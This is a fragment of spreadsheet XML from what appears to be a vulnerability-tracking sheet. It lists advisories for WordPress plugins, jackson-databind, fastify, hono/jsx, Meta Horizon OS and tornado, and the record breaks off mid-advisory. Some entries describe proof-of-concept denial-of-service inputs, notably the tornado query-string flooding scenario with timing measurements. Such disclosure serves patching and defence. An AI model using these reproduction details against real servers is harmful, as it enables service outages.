      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr"/>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion Lite  WordPress plugin before 3.48.0 does not perform a capability check on two of its admin AJAX handlers, allowing any authenticated subscriber to read other users' email addresses and to trigger a cross-user CRM re-sync.</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90972</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90974</t>
        </is>
      </c>
      <c r="D646" s="5" t="inlineStr"/>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="inlineStr"/>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr"/>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion Lite  WordPress plugin before 3.48.0 does not require authentication on a settings handler that runs during admin initialization, allowing unauthenticated users to overwrite the site's CRM integration endpoint and credentials, after which synced user data is delivered to an attacker-chosen host.</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90974</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91776</t>
        </is>
      </c>
      <c r="D647" s="5" t="inlineStr"/>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M647" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr"/>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>### Summary
With `@JsonTypeInfo(use = Id.NAME, defaultImpl = ...)`, every distinct unknown
raw type ID selects the same fallback deserializer but is retained as a
separate key in `TypeDeserializerBase._deserializers`. An attacker who can
repeatedly supply new unknown type IDs can grow this process-lifetime cache
without a configured bound.
### Details
The affected path is `TypeDeserializerBase._findDeserializer()`. After an
unknown name-based type ID resolves to the configured fallback/default
implementation, jackson-databind caches the result under the attacker-provided
raw `typeId`. Although all such IDs select the same fallback deserializer, each
new string remains a distinct cache key.
The behavior is runtime-confirmed in jackson-databind 2.22.1 and 3.2.1.
Current 2.22 and 3.2 source branches retained the unbounded `_deserializers`
map and per-raw-ID cache write when rechecked. The earlier affected floor has
not been established, patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must enable name-based polymorphism with a
`defaultImpl` or equivalent fallback, accept attacker-influenced type IDs, and
reuse a long-lived mapper/type deserializer across requests.
Suggested correction: avoid caching each unknown raw ID when every such ID
resolves to the same fallback, use a fallback sentinel, or use an explicitly
bounded concurrency-safe cache. A regression should contrast many distinct
unknown IDs with repetitions of one unknown ID across requests.
### PoC
Configure a polymorphic base type with
`@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, defaultImpl = Fallback.class)` and
deserialize inputs containing unknown type names through the same mapper.
Inspect `TypeDeserializerBase._deserializers` after the run.
On affected 2.x and 3.x versions, 10,000 distinct unknown raw type IDs produce
10,000 retained cache entries even though every input selects the same
fallback deserializer. A matched control that repeats one unknown ID 10,000
times produces one retained entry. This isolates attacker-controlled key
cardinality from ordinary request count.
### Impact
Where the stated polymorphic fallback configuration is exposed to
attacker-influenced type IDs, distinct inputs cause incremental
process-lifetime memory retention and eventual availability pressure or
denial of service. This is not claimed as a single-request allocation spike,
and no fixed bytes-per-ID or time-to-out-of-memory value is asserted. No
confidentiality, integrity, or code-execution impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91776</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91777</t>
        </is>
      </c>
      <c r="D648" s="5" t="inlineStr"/>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M648" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr"/>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>### Summary
When an `@JsonIdentityInfo` collection or map first creates N unresolved
object-ID references and later resolves the same IDs in reverse order,
jackson-databind scans the remaining pending-reference accumulator for each
resolution. A shallow JSON document whose size grows linearly can therefore
cause quadratic CPU work during deserialization.
### Details
The affected path is forward-reference completion in
`CollectionDeserializer.CollectionReferringAccumulator.resolveForwardReference()`
and the corresponding map implementation. The implementation performs a
linear search of the pending accumulator for every resolved object ID.
The behavior is runtime-confirmed in jackson-databind 2.5.0, 2.22.1, and
3.2.1. Current 2.22 and 3.2 source branches retained the same design when
rechecked. A 2.4.0 control fails closed before successful reverse-order
completion, so 2.5.0 is the conservative runtime-confirmed affected floor.
The patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must deserialize attacker-influenced JSON into an
identity-enabled collection or map. The issue does not require deep nesting or
syntactically unusual JSON.
Suggested correction: replace repeated linear lookup/removal with a keyed
pending-reference structure or another design that provides linear or
amortized-linear completion. A regression should preserve input order,
duplicate-ID behavior, and unresolved-ID errors while bounding reverse-order
resolution work.
### PoC
The proof constructs a shallow collection containing N unresolved
`@JsonIdentityInfo` references followed by definitions of those same IDs in
reverse order. Its ID class counts `equals()` calls, giving a deterministic
work measure rather than a timing-dependent result.
With N=2,000, affected versions perform exactly 2,003,000 ID comparisons. An
equally sized control in which every reference is already resolved performs
zero comparisons in the pending-reference lookup path. The run is bounded to
a 512 MiB JVM. The result demonstrates quadratic growth: approximately
`N * (N + 1) / 2` comparisons, plus fixed setup comparisons.
### Impact
An unauthenticated source that can submit JSON to an application using the
affected identity-enabled collection or map shape can consume quadratic CPU
and exhaust a request-time or worker-capacity budget, causing denial of
service. The application model/configuration prerequisite is material. No
confidentiality, integrity, code-execution, or parser-depth impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91777</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92081</t>
        </is>
      </c>
      <c r="D649" s="5" t="inlineStr"/>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M649" s="5" t="inlineStr">
        <is>
          <t>5.12.5</t>
        </is>
      </c>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr"/>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fastify` crashes with an uncaught `ERR_HTTP2_INVALID_CONNECTION_HEADERS` exception when a route that registers a response trailer via `reply.trailer()` is served over HTTP/2. Fastify unconditionally adds the `Transfer-Encoding: chunked` header when a trailer is set, which is forbidden on HTTP/2, so Node.js throws while serializing the response headers. The exception is not caught and becomes an uncaughtException, terminating the Node.js process.
One unauthenticated HTTP/2 request to any route that uses trailers is enough to crash the server, dropping all in-flight requests, and the request can be repeated to keep the process down. Applications are affected only when HTTP/2 is enabled (`http2: true`) and at least one route registers a trailer. HTTP/1.x responses are not affected.
### Patches
Upgrade to `fastify` `5.12.5` or later.
### Workarounds
Avoid registering response trailers with `reply.trailer()` on routes served over HTTP/2 until upgrading.</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92081</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92172</t>
        </is>
      </c>
      <c r="D650" s="5" t="inlineStr"/>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="inlineStr"/>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr"/>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>Prior to v66.0.0.733.524 of Meta Horizon OS, OVRMediaService could be induced to send a privileged PendingIntent including a com.oculus.horizon CallerIdentity to an arbitrary application registering for com.oculus.systemactivities.SCREENSHOT via a broadcast receiver. That would allow the application to impersonate the com.oculus.horizon package towards any endpoint within the OS that uses CallerIdentity authentication.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92172</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92173</t>
        </is>
      </c>
      <c r="D651" s="5" t="inlineStr"/>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="inlineStr"/>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr"/>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>Prior to v74.0.0.878.1682 of Meta Horizon OS, MediaSyncJobReceiver could be induced to send a privileged PendingIntent including a com.oculus.vrshell CallerIdentity to an arbitrary application listening via NotificationListenerService. That would allow the application to impersonate the com.oculus.vrshell package, as well as packages signed with the same key, towards any endpoint within the OS that uses CallerIdentity authentication.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92173</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92412</t>
        </is>
      </c>
      <c r="D652" s="5" t="inlineStr"/>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="inlineStr"/>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr"/>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>The Five Star Restaurant Reviews WordPress plugin before 2.3.14 does not properly escape a user-supplied value before outputting it into an HTML tag, allowing unauthenticated attackers to inject arbitrary web script that runs in the browser of anyone tricked into submitting a crafted request, including a logged-in administrator.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92412</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93981</t>
        </is>
      </c>
      <c r="D653" s="5" t="inlineStr"/>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr">
        <is>
          <t>npm:hono</t>
        </is>
      </c>
      <c r="M653" s="5" t="inlineStr">
        <is>
          <t>4.13.7</t>
        </is>
      </c>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr"/>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>### Summary
`hono/jsx` does not HTML-escape a plain string placed directly as a child or `fallback` of `Suspense` or `ErrorBoundary`, as the only child of a `Context.Provider`, or as the root value of `renderToString()` / `renderToReadableStream()` from `hono/jsx/dom/server`. Such a string is emitted as markup instead of text.
### Details
These paths stringify their input and treat the result as already-escaped HTML, so a plain string passes through unchanged. Notable cases:
- `Suspense`: a string child, or a string `fallback` while a child suspends. With streaming, the fallback reaches the browser in the initial chunk.
- `ErrorBoundary`: a string child alongside an asynchronous sibling. The all-synchronous case was fixed in 4.11.7 (GHSA-9r54-q6cx-xmh5).
- `Context.Provider`: a single string child. Multiple children are escaped.
- `hono/jsx/dom/server`: a string, or an array containing strings, passed as the root.
A lone `{children}` forwarded by a wrapper component is enough to reach these paths. Strings wrapped in an element, values from `raw()` or the `html` helper, and client-side rendering with `hono/jsx/dom` are not affected.
### Impact
An attacker who controls a string rendered in an affected position can inject arbitrary HTML into the server-rendered page, leading to cross-site scripting under the application's origin.
This issue affects applications that render untrusted strings directly in one of the positions above during server-side rendering.</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93981</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96173</t>
        </is>
      </c>
      <c r="D654" s="5" t="inlineStr"/>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="inlineStr"/>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr"/>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not verify that the requester is authorized to view an order before redirecting a public payment-callback request, allowing unauthenticated attackers to obtain the order key of an arbitrary order and view its contents.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96173</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96200</t>
        </is>
      </c>
      <c r="D655" s="5" t="inlineStr"/>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="inlineStr"/>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr"/>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not verify that payment notifications received by its payment callback come from the payment provider, allowing unauthenticated attackers to mark arbitrary orders as paid without payment.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96200</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96255</t>
        </is>
      </c>
      <c r="D656" s="5" t="inlineStr"/>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="inlineStr"/>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr"/>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>The Payments for Hubtel WordPress plugin before 1.0.2 does not prevent public access to a debug log in which it records payment requests, including the store's payment gateway API credentials in plain text, allowing unauthenticated attackers to obtain those credentials.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96255</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>GHSA-3hv7-mjh2-fv65</t>
        </is>
      </c>
      <c r="D657" s="5" t="inlineStr"/>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr">
        <is>
          <t>PyPI:tornado</t>
        </is>
      </c>
      <c r="M657" s="5" t="inlineStr">
        <is>
          <t>6.5.9</t>
        </is>
      </c>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr"/>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>## Summary
`HTTPServerRequest.__init__` in `tornado/httputil.py` parses the URL query string via
`parse_qs_bytes()` with no field-count limit — while the sibling POST-body parsing path
(`parse_body_arguments`) received a `max_num_fields=1000` cap added earlier in this exact
same release (v6.5.8, commit `8d6363ed`), explicitly to bound parsing cost for the identical
underlying primitive. This leaves the query-string path with the resource-exhaustion exposure
the body-path fix was meant to close.
**File**: `tornado/httputil.py`, line 553 (`HTTPServerRequest.__init__`)
### Root Cause
```python
# tornado/httputil.py:553 (before fix)
self.arguments = parse_qs_bytes(self.query, keep_blank_values=True)
```
Compare with the POST-body path fixed one commit earlier in the same release:
```python
# tornado/httputil.py:1038-1041
uri_arguments = parse_qs_bytes(
    body,
    keep_blank_values=True,
    max_num_fields=config.urlencoded.max_arguments,  # default 1000
)
```
Both call sites funnel through the same `tornado.escape.parse_qs_bytes` (a thin wrapper over
`urllib.parse.parse_qs`), which is exactly why `max_num_fields` was added to
`urllib.parse.parse_qsl` upstream — to let frameworks bound field count. The fix was applied
only to the body path; the query-string path was missed.
The request line + headers together are capped at `max_header_size` (default 65536 bytes), so
this is not literally unbounded, but a single ~64KB request line can carry thousands of short
`key=value` pairs — far beyond the 1000-field limit the maintainer judged appropriate for the
structurally identical body case.
### Attack Scenario
1. Attacker sends a `GET` request whose query string is packed with thousands of short fields
   (e.g. `k0=1&amp;k1=1&amp;...&amp;k7799=1`, ~61KB), fitting comfortably under `max_header_size`. No
   authentication, cookies, or prior state required.
2. Tornado accepts and parses this with no field-count cap, unlike the equivalent POST-body
   request (which is correctly rejected with 400 once &gt;1000 fields are present).
3. Parsing thousands of fields is CPU work performed synchronously inside Tornado's
   single-threaded `IOLoop`. Several such requests in flight concurrently stall the event
   loop, delaying processing of *all* other connections on that loop — not just the
   attacker's own request.
### Verification (dynamic, local reproduction against v6.5.8)
Ran the unmodified v6.5.8 source directly (no external dependencies needed) with a minimal
`tornado.web.Application` on `127.0.0.1:8888`.
- Identical 7800-field/~61KB payload sent as GET query string → `200 OK`; sent as POST body
  (`application/x-www-form-urlencoded`) → `400 Bad Request` (correctly rejected by the
  existing `max_num_fields` body-path limit). This confirms the asymmetry directly.
- Per-request parse cost: baseline (`/?a=1`) averaged 1.86ms; the 7800-field query string
  averaged 25.1ms (~13x).
- Event-loop-blocking amplification (raw-socket test, isolating server-side stall from
  client overhead): with 10 sequential baseline probe requests fired with no load, average
  latency was 1.47ms (max 5.9ms). With 5 concurrent 61KB/7800-field requests in flight,
  the same baseline probes averaged 13.0ms (max 118.1ms) — an **8.9x average slowdown** for
  unrelated clients, produced by ~305KB of unauthenticated attacker traffic.
### Impact
All Tornado servers/applications are affected — this triggers on every request with a query
string, independent of application/handler logic. An unauthenticated, unprivileged remote
attacker can measurably degrade response times for all other clients sharing the same
`IOLoop`, using a small amount of bandwidth and no special conditions. This is an
availability/DoS concern; no confidentiality or integrity impact.
### Recommended Fix
```python
# tornado/httputil.py — HTTPServerRequest.__init__
if uri is not None:
